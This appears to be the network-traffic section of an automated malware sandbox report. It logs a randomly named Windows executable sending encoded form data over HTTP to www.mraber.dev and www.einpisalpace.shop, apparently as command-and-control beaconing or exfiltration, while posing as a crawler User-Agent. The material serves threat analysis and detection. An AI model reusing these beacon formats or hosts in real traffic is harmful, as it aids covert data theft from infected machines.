Jan 11, 2025 01:56:06.854203939 CET	1713	OUT	POST /ixqi/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate Host: www.mraber.dev Origin: http://www.mraber.dev Referer: http://www.mraber.dev/ixqi/ Content-Length: 1247 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/) Data Raw: 39 46 3d 65 50 56 45 59 56 44 6f 70 53 62 79 75 6e 4c 41 79 55 31 74 71 55 4d 65 4a 49 72 4c 6b 42 77 2b 79 37 31 4e 31 34 44 43 46 74 43 53 2f 30 30 65 65 70 61 55 69 65 6b 42 30 33 6a 4c 64 4f 61 30 59 4c 2f 6c 63 73 6e 6a 61 51 54 56 6d 59 6f 51 56 38 51 69 64 33 4f 4a 76 73 37 6c 74 36 4f 4a 55 48 45 58 52 6f 46 66 51 2f 61 36 69 68 32 50 4d 78 64 4c 59 49 6e 6f 37 6c 4f 67 57 48 79 66 79 6d 52 56 6a 68 47 31 4e 4c 50 6d 35 56 4d 37 69 75 74 6b 33 38 36 4f 53 38 54 76 43 59 6d 45 67 64 38 57 50 5a 4f 6a 56 67 44 6a 77 45 61 6d 6e 51 64 79 30 63 55 41 72 4d 45 6b 37 59 71 4d 61 4c 50 4e 52 67 4e 6b 56 41 58 4e 79 30 55 6b 63 78 58 36 63 56 2f 42 49 52 44 4c 6f 74 55 36 4f 79 79 4d 6f 4b 33 42 69 56 39 43 75 75 7a 61 30 39 42 6e 58 46 66 65 2b 68 63 4a 65 56 5a 44 58 34 42 52 61 36 6a 4e 41 47 33 33 46 70 59 69 76 4a 4d 37 44 6d 76 45 5a 73 74 4f 52 50 76 71 63 51 45 51 63 4a 73 6f 4b 6f 59 6e 4c 4d 4f 56 59 53 58 48 6d 35 65 2b 71 64 69 6d 2b 69 6b 32 34 78 58 34 67 79 46 39 41 4b 58 63 44 47 59 [TRUNCATED] Data Ascii: 9F=ePVEYVDopSbyunLAyU1tqUMeJIrLkBw+y71N14DCFtCS/00eepaUiekB03jLdOa0YL/lcsnjaQTVmYoQV8Qid3OJvs7lt6OJUHEXRoFfQ/a6ih2PMxdLYIno7lOgWHyfymRVjhG1NLPm5VM7iutk386OS8TvCYmEgd8WPZOjVgDjwEamnQdy0cUArMEk7YqMaLPNRgNkVAXNy0UkcxX6cV/BIRDLotU6OyyMoK3BiV9Cuuza09BnXFfe+hcJeVZDX4BRa6jNAG33FpYivJM7DmvEZstORPvqcQEQcJsoKoYnLMOVYSXHm5e+qdim+ik24xX4gyF9AKXcDGYh+en/75D453Ak9ZyGutx4gfkjbCOeN2m0mjJc9CIOLKZLlwqB63iiZDv8po2Mj+ZBTjnTDUaVEa2ACD5OYgS7GyxbKaFfN3Arq7v1eCnPHucqx0TaPKBKSbdPP8jT6nyomzXF0JzuL4Y36Ac66CU/wLLCF1lomJIateWZSBgo0e4gug6Cq3ar9NrYSvdAjJYbK9IcgNXrjsvIuUb6bTFVzg2GOaPCHl2CGRW5aSpDrC5Sw0/KJkWvwaPy+pt8kPZx27SRysh8Q8ZpeqLhCWxCQQVJhKWoZnyl5pjUI5nPQVZPZqoXXORbmdNAfEDU/X3hci3jWW1vIbLFLFaf6xh8IbIRZZTF4Z6z/LXb911pPquQ1kt/bEXP50ca4UB6R2szGCDnY9j4NuT5s4CTqYtGAhXaX7r16moEHRGS0f4LWUpdNZd9hFTYGYoLcohdJ2f54Ok0T0WFkdQOOQg6BonfVLyS0vUi83kIhbwtnIWWCWZchbBgfwjGia92/OqbVwfEDRJ+hkRhgq8md3iXwKlxy3FMcm8te646BTtw10ck2bJcWx3BMYkPLQhbkx/qLtH4YpMbcDeM06F3L2L0FqnGgxbwufEiCEdV8Tc75vif+H+qpbS5nK3Q0VL8SnSbpzr0d3anFQvoFIAWYdaTYJ5TLtK7Di771haXG [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.7	49989	46.38.243.234	80	1228	C:\Program Files (x86)\fZntWIwPsvXltFXeGadUlvMRdPOdaWZtaZLBrrFdufYUijSKGLHiGSUyPjh\fIydfvfomIEE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:56:09.397954941 CET	425	OUT	GET /ixqi/?9F=TN9kbi/KmEXimVSK7kRkm1cjJuW4yHg+jZBVyY7nUo7X8XNTQ6Sf+9UR1HXDT/eLXOeLcdefCmPPvtkAMYUyfl2Biaruko68KDljX6JEffS78HWaQA9pI6q30E6ldWWZvXFcrza4Lp7u&wtE0B=1LjxZz HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US Host: www.mraber.dev Connection: close User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)
Jan 11, 2025 01:56:11.324201107 CET	456	IN	HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 00:53:30 GMT Server: Apache/2.4.10 (Debian) Content-Length: 276 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6d 72 61 62 65 72 2e 64 65 76 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.10 (Debian) Server at www.mraber.dev Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.7	49990	188.114.96.3	80	1228	C:\Program Files (x86)\fZntWIwPsvXltFXeGadUlvMRdPOdaWZtaZLBrrFdufYUijSKGLHiGSUyPjh\fIydfvfomIEE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:56:16.376620054 CET	701	OUT	POST /8g74/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate Host: www.einpisalpace.shop Origin: http://www.einpisalpace.shop Referer: http://www.einpisalpace.shop/8g74/ Content-Length: 215 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/) Data Raw: 39 46 3d 62 4c 58 4c 47 65 79 79 5a 4e 43 57 5a 73 75 4c 46 51 6f 71 49 48 65 6d 37 6e 61 79 6f 71 6a 53 50 66 4b 69 75 4d 4e 51 66 72 56 61 46 35 43 78 47 64 75 34 46 4a 75 6e 63 75 54 67 36 67 2f 78 59 2b 51 4e 58 55 63 4f 76 6f 31 5a 49 35 34 4d 58 46 48 6b 6b 68 4d 30 6d 32 6b 54 39 35 79 71 44 62 39 74 30 50 62 42 62 2b 69 70 43 4d 39 53 4f 46 71 50 6d 76 58 41 33 65 70 64 35 35 76 76 77 70 7a 73 67 36 44 67 34 4a 35 70 30 35 30 31 32 73 32 70 7a 56 64 68 77 4d 53 73 52 39 55 41 34 43 47 55 53 6d 6a 71 7a 68 64 43 5a 6e 5a 75 62 46 53 2f 55 49 42 4a 35 4f 71 45 33 30 67 55 62 68 6e 37 37 5a 6b 6b 2f 70 4f 64 5a 32 2b 67 58 51 3d 3d Data Ascii: 9F=bLXLGeyyZNCWZsuLFQoqIHem7nayoqjSPfKiuMNQfrVaF5CxGdu4FJuncuTg6g/xY+QNXUcOvo1ZI54MXFHkkhM0m2kT95yqDb9t0PbBb+ipCM9SOFqPmvXA3epd55vvwpzsg6Dg4J5p05012s2pzVdhwMSsR9UA4CGUSmjqzhdCZnZubFS/UIBJ5OqE30gUbhn77Zkk/pOdZ2+gXQ==
Jan 11, 2025 01:56:17.568973064 CET	1236	IN	HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 00:56:17 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Last-Modified: Sun, 05 Jan 2025 21:39:02 GMT cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R0xc5nd1zjFpTNNLzntowBkrGHLZ37WWF44QHn%2BsXVpkKZcqHUte534XUpvk6RjoAhSy3DkkPwxi0CQA4LdpLk9Yxt9bx%2FSzaeuYe4h%2FcHd0s0Io9mRvXv17PEzr1dRLqoMHw0NrKmc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9000f230bd69c407-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1580&min_rtt=1580&rtt_var=790&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=701&delivery_rate=0&cwnd=195&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 32 63 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 54 4d 6f db 38 10 bd e7 57 cc 2a d8 45 17 a8 4c cb 4e 9b 58 92 05 64 ed 04 5b a0 db 06 ad 8b dd 1c 19 69 2c 32 95 48 2e 39 96 ad 06 fd ef 05 25 c5 76 d0 0f f4 50 ea 42 cd bc 79 6f 86 9c 61 fa db f2 ed 62 75 7b 73 05 82 ea 0a 6e 3e fc f5 fa d5 02 82 90 b1 7f a7 0b c6 96 ab 25 fc f7 f7 ea 9f d7 10 8d c6 f0 9e ac cc 89 b1 ab 37 01 04 82 c8 c4 8c 6d b7 db d1 76 3a d2 b6 64 ab 77 6c e7 59 22 1f 36 6c 43 d7 c5 8c 0a 2a 82 ec 24 ed 44 76 75 a5 dc fc 1b 04 d1 6c 36 eb e3 02 0f 8a 2b ae ca 79 80 2a 80 fd 2e 4b 05 f2 22 3b 01 00 48 49 52 85 d9 d9 f8 0c fe a8 0b ee 44 02 6f 34 c1 b5 de a8 22 65 bd b3 07 d6 48 1c bc 5e 88 ff 6f 64 33 0f 16 5a 11 2a 0a 57 ad c1 00 f2 fe 6f 1e 10 ee 88 79 fd 04 72 c1 ad 43 9a 7f 58 5d 87 17 01 3b 26 52 bc c6 79 50 a0 cb ad 34 24 b5 3a 62 78 af ad 6d 9f 83 e1 25 82 d2 04 6b 9f cc 3e dc 51 5b 21 50 6b 70 d0 ca 9d 0b 7a 9f 5f 77 ba 68 e1 61 ad 15 85 4e 7e c2 38 3a 33 bb 04 72 5d 69 1b 9f 9e 77 2b 81 ce bd e6 b5 ac da 98 5b c9 ab 04 3c [TRUNCATED] Data Ascii: 2cfTMo8WELNXd[i,2H.9%vPByoabu{sn>%7mv:dwlY"6lC$Dvul6+y.K";HIRDo4"eH^od3ZWoyrCX];&RyP4$:bxm%k>Q[!Pkpz_whaN~8:3r]iw+[<U+Y8GEh{N=aQf
Jan 11, 2025 01:56:17.568995953 CET	380	IN	Data Raw: 96 52 c5 70 3e 36 3b 18 fb ef 98 60 02 0f 3d 1e 4e 97 57 2f 17 2f 96 4f 73 80 21 89 83 08 4c 3a 91 ce b0 45 59 0a 8a e1 4e 57 45 02 15 12 a1 0d 9d e1 b9 54 65 0c 61 e4 81 8f f2 e1 b4 93 9f ce cc ee 48 df c0 c3 56 16 24 e2 69 4f fb 75 b1 03 41 58 Data Ascii: Rp>6;`=NW//Os!L:EYNWETeaHV$iOuAXb!iwGiyP(dK4<x8'F:IXs"t;uw&K9$TF:^mX}eKRfK +dsWv@~fZ-ZT%<PhtD

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.7	49991	188.114.96.3	80	1228	C:\Program Files (x86)\fZntWIwPsvXltFXeGadUlvMRdPOdaWZtaZLBrrFdufYUijSKGLHiGSUyPjh\fIydfvfomIEE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:56:19.054090977 CET	721	OUT	POST /8g74/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate Host: www.einpisalpace.shop Origin: http://www.einpisalpace.shop Referer: http://www.einpisalpace.shop/8g74/ Content-Length: 235 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/) Data Raw: 39 46 3d 62 4c 58 4c 47 65 79 79 5a 4e 43 57 59 4d 2b 4c 4b 57 67 71 5a 58 65 6c 2b 6e 61 79 69 4b 6a 57 50 66 47 69 75 49 64 41 63 65 46 61 4c 38 75 78 46 5a 79 34 43 4a 75 6e 57 4f 54 68 6e 51 2f 2b 59 2b 63 61 58 56 67 4f 76 6f 52 5a 49 37 51 4d 58 79 7a 6e 2b 52 4d 32 34 57 6b 64 6a 4a 79 71 44 62 39 74 30 4f 2b 63 62 2b 36 70 43 39 4e 53 50 6b 71 4d 6c 76 58 48 77 65 70 64 75 70 76 7a 77 70 7a 53 67 37 65 6f 34 4c 42 70 30 35 45 31 34 59 69 71 35 56 64 6a 2b 73 54 45 59 66 42 75 69 6a 69 52 54 31 44 79 38 44 77 68 56 78 59 4d 42 6e 65 54 4b 5a 35 79 39 4d 4f 79 67 53 39 68 5a 67 6a 6a 32 37 51 46 67 65 72 33 55 6b 66 6b 42 72 4a 76 7a 61 77 52 74 2f 37 70 2f 50 35 4f 54 6d 2f 74 41 32 45 3d Data Ascii: 9F=bLXLGeyyZNCWYM+LKWgqZXel+nayiKjWPfGiuIdAceFaL8uxFZy4CJunWOThnQ/+Y+caXVgOvoRZI7QMXyzn+RM24WkdjJyqDb9t0O+cb+6pC9NSPkqMlvXHwepdupvzwpzSg7eo4LBp05E14Yiq5Vdj+sTEYfBuijiRT1Dy8DwhVxYMBneTKZ5y9MOygS9hZgjj27QFger3UkfkBrJvzawRt/7p/P5OTm/tA2E=
Jan 11, 2025 01:56:20.085652113 CET	1236	IN	HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 00:56:20 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Last-Modified: Sun, 05 Jan 2025 21:39:02 GMT cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p%2BPkj%2FnhsdJ130VuUrtmd02HCaumrdINsUkoaVAfl2QzBwAZx6i8hd3zMOUGnxHLlOjge1HTB5vbWg8FlstPNu24cDbZ8uqsy00YhXK7qX%2BjTiWxK2a%2Fm%2BVi5U16h04vk9QY7IKYP7U%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9000f240fb875e73-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1689&min_rtt=1689&rtt_var=844&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=721&delivery_rate=0&cwnd=204&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 32 64 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 54 4d 6f db 38 10 bd e7 57 cc 2a d8 45 17 a8 4c cb 4e 9b 58 92 05 64 ed 04 5b a0 db 06 ad 8b dd 1c 19 69 2c 32 95 48 2e 39 96 ad 06 fd ef 05 25 c5 76 d0 0f f4 50 ea 42 cd bc 79 6f 86 9c 61 fa db f2 ed 62 75 7b 73 05 82 ea 0a 6e 3e fc f5 fa d5 02 82 90 b1 7f a7 0b c6 96 ab 25 fc f7 f7 ea 9f d7 10 8d c6 f0 9e ac cc 89 b1 ab 37 01 04 82 c8 c4 8c 6d b7 db d1 76 3a d2 b6 64 ab 77 6c e7 59 22 1f 36 6c 43 d7 c5 8c 0a 2a 82 ec 24 ed 44 76 75 a5 dc fc 1b 04 d1 6c 36 eb e3 02 0f 8a 2b ae ca 79 80 2a 80 fd 2e 4b 05 f2 22 3b 01 00 48 49 52 85 d9 d9 f8 0c fe a8 0b ee 44 02 6f 34 c1 b5 de a8 22 65 bd b3 07 d6 48 1c bc 5e 88 ff 6f 64 33 0f 16 5a 11 2a 0a 57 ad c1 00 f2 fe 6f 1e 10 ee 88 79 fd 04 72 c1 ad 43 9a 7f 58 5d 87 17 01 3b 26 52 bc c6 79 50 a0 cb ad 34 24 b5 3a 62 78 af ad 6d 9f 83 e1 25 82 d2 04 6b 9f cc 3e dc 51 5b 21 50 6b 70 d0 ca 9d 0b 7a 9f 5f 77 ba 68 e1 61 ad 15 85 4e 7e c2 38 3a 33 bb 04 72 5d 69 1b 9f 9e 77 2b 81 ce bd e6 b5 ac da 98 5b c9 ab 04 3c [TRUNCATED] Data Ascii: 2daTMo8WELNXd[i,2H.9%vPByoabu{sn>%7mv:dwlY"6lC$Dvul6+y.K";HIRDo4"eH^od3ZWoyrCX];&RyP4$:bxm%k>Q[!Pkpz_whaN~8:3r]iw+[<U+Y8GEh{N=aQf
Jan 11, 2025 01:56:20.085679054 CET	379	IN	Data Raw: d7 09 d4 dc 96 52 c5 70 3e 36 3b 18 fb ef 98 60 02 0f 3d 1e 4e 97 57 2f 17 2f 96 4f 73 80 21 89 83 08 4c 3a 91 ce b0 45 59 0a 8a e1 4e 57 45 02 15 12 a1 0d 9d e1 b9 54 65 0c 61 e4 81 8f f2 e1 b4 93 9f ce cc ee 48 df c0 c3 56 16 24 e2 69 4f fb 75 Data Ascii: Rp>6;`=NW//Os!L:EYNWETeaHV$iOuAXb!iwGiyP(dK4<x8'F:IXs"t;uw&K9$TF:^mX}eKRfK +dsWv@~fZ-ZT%<P

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.7	49992	188.114.96.3	80	1228	C:\Program Files (x86)\fZntWIwPsvXltFXeGadUlvMRdPOdaWZtaZLBrrFdufYUijSKGLHiGSUyPjh\fIydfvfomIEE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:56:21.732812881 CET	1734	OUT	POST /8g74/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate Host: www.einpisalpace.shop Origin: http://www.einpisalpace.shop Referer: http://www.einpisalpace.shop/8g74/ Content-Length: 1247 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/) Data Raw: 39 46 3d 62 4c 58 4c 47 65 79 79 5a 4e 43 57 59 4d 2b 4c 4b 57 67 71 5a 58 65 6c 2b 6e 61 79 69 4b 6a 57 50 66 47 69 75 49 64 41 63 65 4e 61 4c 4b 36 78 48 2b 47 34 44 4a 75 6e 49 65 54 6b 6e 51 2f 5a 59 39 73 57 58 56 74 7a 76 71 5a 5a 4a 59 6f 4d 66 6d 76 6e 72 42 4d 32 77 32 6b 63 39 35 7a 2b 44 62 74 70 30 4f 75 63 62 2b 36 70 43 2b 56 53 47 56 71 4d 70 50 58 41 33 65 70 5a 35 35 76 50 77 70 72 6b 67 34 79 34 37 36 68 70 31 64 6f 31 36 75 65 71 78 56 64 6c 39 73 54 63 59 66 64 74 69 6a 2b 6e 54 30 33 49 38 41 67 68 52 56 56 6a 52 30 79 36 58 72 5a 36 30 4e 32 54 31 45 31 63 52 43 72 42 7a 5a 38 78 38 4a 37 50 51 55 7a 63 43 63 73 33 68 4c 73 35 71 4c 33 39 75 2f 41 46 4c 32 44 6d 65 53 2f 41 73 62 79 61 41 73 52 77 64 47 4f 6d 41 44 51 73 4f 54 50 75 7a 69 54 64 53 6b 44 6c 36 42 68 41 6d 31 33 56 7a 2b 6f 49 6b 67 44 76 55 79 35 61 78 58 37 53 42 36 65 65 71 69 48 45 76 74 47 6b 4c 39 63 79 55 2f 49 53 69 69 6f 33 59 58 78 62 67 4e 33 61 63 34 39 2f 54 42 62 62 2f 37 37 70 4c 78 64 35 70 4b 2b [TRUNCATED] Data Ascii: 9F=bLXLGeyyZNCWYM+LKWgqZXel+nayiKjWPfGiuIdAceNaLK6xH+G4DJunIeTknQ/ZY9sWXVtzvqZZJYoMfmvnrBM2w2kc95z+Dbtp0Oucb+6pC+VSGVqMpPXA3epZ55vPwprkg4y476hp1do16ueqxVdl9sTcYfdtij+nT03I8AghRVVjR0y6XrZ60N2T1E1cRCrBzZ8x8J7PQUzcCcs3hLs5qL39u/AFL2DmeS/AsbyaAsRwdGOmADQsOTPuziTdSkDl6BhAm13Vz+oIkgDvUy5axX7SB6eeqiHEvtGkL9cyU/ISiio3YXxbgN3ac49/TBbb/77pLxd5pK+qMwft5JkOxf/rkJbS5loIIcbfAm9t/lVQkILrkw+Bmfj+VwuhANyA3taNnrDzTDLy0K+UcWxKmVhEFEdOjsgpReImiSpG+08/i7vRH1aJmTDqEoE6k2UyLWSz2C2HzP/WdeYYZTAb4QB8PPmrrU/P5TMYG9E5bgATn38K+0UYSia2Zyh0n08S0ENk1pXreeG5CTMlin0FAv7MQD21c0+uWGpHJzrjUwU1lDyHWBbo+fu3/cF1SJYeoKt49foM7llEP30Eu0uW1C9+sn7wQeWcouDst6aTT8jG1uyrthZ5qtRByYT4dTaiS8U369Gzb3dTdNmaP0Or0fm5QE/bKiiPZjvqOWXqtdKwwydMWtJERzkVg8ExrqBD5Mnc5hDrjZ7ZQ1dzqi1pl1fVxTN5x9wmwgr2nOj3Z/8+Uh2PFLMmNSH1o4CCuRPcZNk3AFb/01QkKv8rlYdDPtPDXXxFjT0To/qKQ8QncZundVaanwU6d+FicPZU/saLJc7oIVwLnWoJc08OGT9VtzkvbzvBWzZKyWhoURHQxBah3ulnZbNJoAJkmWhD+RG5U58qyQ2Rcsu/MvsAt2ivfD6DJ8cTRQgLn6QMEHbr3ACWVR4HRwh/f50wY2I3vY182pzvcf3jPTwcYyUO6g3M8ksLCBzDIkQTat6K0dXc0ZRY+ [TRUNCATED]
Jan 11, 2025 01:56:22.805789948 CET	1236	IN	HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 00:56:22 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Last-Modified: Sun, 05 Jan 2025 21:39:02 GMT cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L8OMLhX9Ru9PUq0yPEcuntxiZq5Fj12PrbtZvQ0%2BHUsjg3l748YFtNP13i77NrPLOz3cy660zBMrfvMeAxLt3krWxbj0A7ok3Zkav751M%2Be67bJSQTG0A4cfObnu%2Bq2BkVGY3Tzrllc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9000f251b8f40f84-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1600&min_rtt=1600&rtt_var=800&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1734&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 32 63 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 54 4d 6f db 38 10 bd e7 57 cc 2a d8 45 17 a8 4c cb 4e 9b 58 92 05 64 ed 04 5b a0 db 06 ad 8b dd 1c 19 69 2c 32 95 48 2e 39 96 ad 06 fd ef 05 25 c5 76 d0 0f f4 50 ea 42 cd bc 79 6f 86 9c 61 fa db f2 ed 62 75 7b 73 05 82 ea 0a 6e 3e fc f5 fa d5 02 82 90 b1 7f a7 0b c6 96 ab 25 fc f7 f7 ea 9f d7 10 8d c6 f0 9e ac cc 89 b1 ab 37 01 04 82 c8 c4 8c 6d b7 db d1 76 3a d2 b6 64 ab 77 6c e7 59 22 1f 36 6c 43 d7 c5 8c 0a 2a 82 ec 24 ed 44 76 75 a5 dc fc 1b 04 d1 6c 36 eb e3 02 0f 8a 2b ae ca 79 80 2a 80 fd 2e 4b 05 f2 22 3b 01 00 48 49 52 85 d9 d9 f8 0c fe a8 0b ee 44 02 6f 34 c1 b5 de a8 22 65 bd b3 07 d6 48 1c bc 5e 88 ff 6f 64 33 0f 16 5a 11 2a 0a 57 ad c1 00 f2 fe 6f 1e 10 ee 88 79 fd 04 72 c1 ad 43 9a 7f 58 5d 87 17 01 3b 26 52 bc c6 79 50 a0 cb ad 34 24 b5 3a 62 78 af ad 6d 9f 83 e1 25 82 d2 04 6b 9f cc 3e dc 51 5b 21 50 6b 70 d0 ca 9d 0b 7a 9f 5f 77 ba 68 e1 61 ad 15 85 4e 7e c2 38 3a 33 bb 04 72 5d 69 1b 9f 9e 77 2b 81 ce bd e6 b5 ac da 98 5b c9 ab 04 3c [TRUNCATED] Data Ascii: 2cfTMo8WELNXd[i,2H.9%vPByoabu{sn>%7mv:dwlY"6lC$Dvul6+y.K";HIRDo4"eH^od3ZWoyrCX];&RyP4$:bxm%k>Q[!Pkpz_whaN~8:3r]iw+[<U+Y8GEh{N=aQf
Jan 11, 2025 01:56:22.805811882 CET	381	IN	Data Raw: dc 96 52 c5 70 3e 36 3b 18 fb ef 98 60 02 0f 3d 1e 4e 97 57 2f 17 2f 96 4f 73 80 21 89 83 08 4c 3a 91 ce b0 45 59 0a 8a e1 4e 57 45 02 15 12 a1 0d 9d e1 b9 54 65 0c 61 e4 81 8f f2 e1 b4 93 9f ce cc ee 48 df c0 c3 56 16 24 e2 69 4f fb 75 b1 03 41 Data Ascii: Rp>6;`=NW//Os!L:EYNWETeaHV$iOuAXb!iwGiyP(dK4<x8'F:IXs"t;uw&K9$TF:^mX}eKRfK +dsWv@~fZ-ZT%<Pht

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.7	49993	188.114.96.3	80	1228	C:\Program Files (x86)\fZntWIwPsvXltFXeGadUlvMRdPOdaWZtaZLBrrFdufYUijSKGLHiGSUyPjh\fIydfvfomIEE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:56:24.283943892 CET	432	OUT	GET /8g74/?wtE0B=1LjxZz&9F=WJ/rFpSuW7SUTonvHlYgJHet70+40/nSG+S456FFT70GKpWTD+yYW7KPXc3l6inPZ41lXlQU44ttBNcSIyPO/Awb2QEZq+eieNEXwOjUfdTJHvICblirwfj54bAbpLWz76fPuJmn0JFO HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US Host: www.einpisalpace.shop Connection: close User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)
Jan 11, 2025 01:56:25.422071934 CET	1236	IN	HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 00:56:25 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Last-Modified: Sun, 05 Jan 2025 21:39:02 GMT cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H7h%2BaXNKt5IjUfUIYkV5mV1lVM%2Fzc7KJZhrDhs8m22hqYAgLhWJ8L8qYAGgwjRkR0dVYKKq08dbXWwztD16hQYbvWHcUSbF9r8SZtChUhvbkkohl3ec37umHJhMhA7hmhz53ae2y15E%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9000f2625fcf424d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1601&min_rtt=1601&rtt_var=800&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=432&delivery_rate=0&cwnd=206&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 35 39 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 